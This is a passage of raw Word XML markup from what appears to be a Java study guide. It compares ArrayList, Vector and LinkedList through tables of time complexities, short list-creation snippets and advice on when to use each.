            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52345115"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 capacity() and trimToSize() methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="5184D529" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DA29B7B"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1233BC64"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eferred for most cases in modern applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65CF01CC"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in legacy code, thread-safe environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FF26EDE" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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429426D8"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ArrayList example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A31166"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rayList&lt;Integer&gt; arrayList = new ArrayList&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF433B"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rayList.add(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A230BB8"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rayList.add(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D857126" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3352C0CE"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Vector example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB7E60"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ector&lt;Integer&gt; vector = new Vector&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBCCB1"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ector.add(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40187566" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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ector.add(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C8E65" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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4ACF5EFB" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a non-synchronized, dynamically resizing list and performance is a priority in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B960F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if you specifically need synchronization (in a multi-threaded environment) and are working with legacy systems or APIs that still use Vector. For modern multi-threaded list handling, consider alternatives like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyOnWriteArrayList</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Collections.synchronizedList()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEE2B6" w14:textId="3B98742F"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AE7D9B9">
          <v:rect id="_x0000_i1507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74898CD6" w14:textId="77777777" w:rsidR="00132A30" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc196307644"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Best time complexity of Arraylist and Linkedlist? Which is better?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="5C24C17E" w14:textId="0AA2DF69" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ime Complexity Comparison: ArrayList vs LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FF47D"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ere’s a breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best-case time complexities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for common operations in both ArrayList and LinkedLis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7"/>
        <w:gridCol w:w="1879"/>
        <w:gridCol w:w="1894"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="1F544724" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F32099" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F366878" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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rrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1552AA19" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="426C43E7" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3A038B"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ing an element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA6F908"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73ACACC0"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="316182B3" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E75BC06"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ng at the end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BB1A7C"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amortized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45F3B487"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="4A19228B" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04DFD6D6"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ng at the beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A418000"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD83293"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="16721213" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414F12FA"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ng at the middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1197CA8E"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074252E0"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="2CB0518B" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312C2D4F"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moving an element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D2F157"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65814E93"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="6FB2BBD5" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033509CE"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moving from the end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C5E22E"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682B6FC"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="48492BBC" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36DCD5DD"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moving from the beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51053FF3"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51731DC0"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constant time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="302688A0" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1FB519"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arching for an element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7345D6"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4B2710"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linear time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="515426AF" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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tailed Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CE922" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ccessing an Element (by index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6883DD" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Since ArrayList uses an array, it allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direct index-based access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This operation takes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time, which is constant time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139765D7" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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In a LinkedList, to access an element, you need to traverse the list from the head to the specific index. This operation takes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time, where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AB78E" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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on/Deletion at the End</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0A33F" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Inserting at the end of an ArrayList is generally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but sometimes it can take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when the internal array is full and needs to be resized (which involves copying all elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13677F" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Inserting at the end of a LinkedList is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because you can directly add the element at the end, without needing to shift other elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49767B82" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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on/Deletion at the Beginning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CF42E" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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If you insert or delete an element at the beginning of an ArrayList, all other elements have to be shifted. This operation takes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time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE06D44" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Inserting or deleting an element at the beginning of a LinkedList is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because it involves just adjusting the pointers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC9A66" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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on/Deletion at the Middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C2CF2" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Inserting or deleting in the middle of an ArrayList requires shifting elements after the insertion or deletion point. This operation takes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time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C651D5A" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Inserting or deleting in the middle of a LinkedList requires traversal to find the position (which is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and then adjusting the pointers, which also takes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time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23CC94" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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arching for an Element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C1D28" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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oth ArrayList and LinkedList have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time complexity for searching an element because both require linear traversal to find the element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A78E1B" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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ich is Better?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B035DF9"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choice between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depends on your specific use case and the types of operations you need to perform most often:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B391430" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ArrayList when</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C863A8" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4054B" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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frequently access elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BB8E1" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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sertions and deletions are mostly happening at the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A07725" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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emory overhead is a concern (since ArrayList uses contiguous memory and is more cache-friendly).</w:t>
      </w:r>
    </w:p>
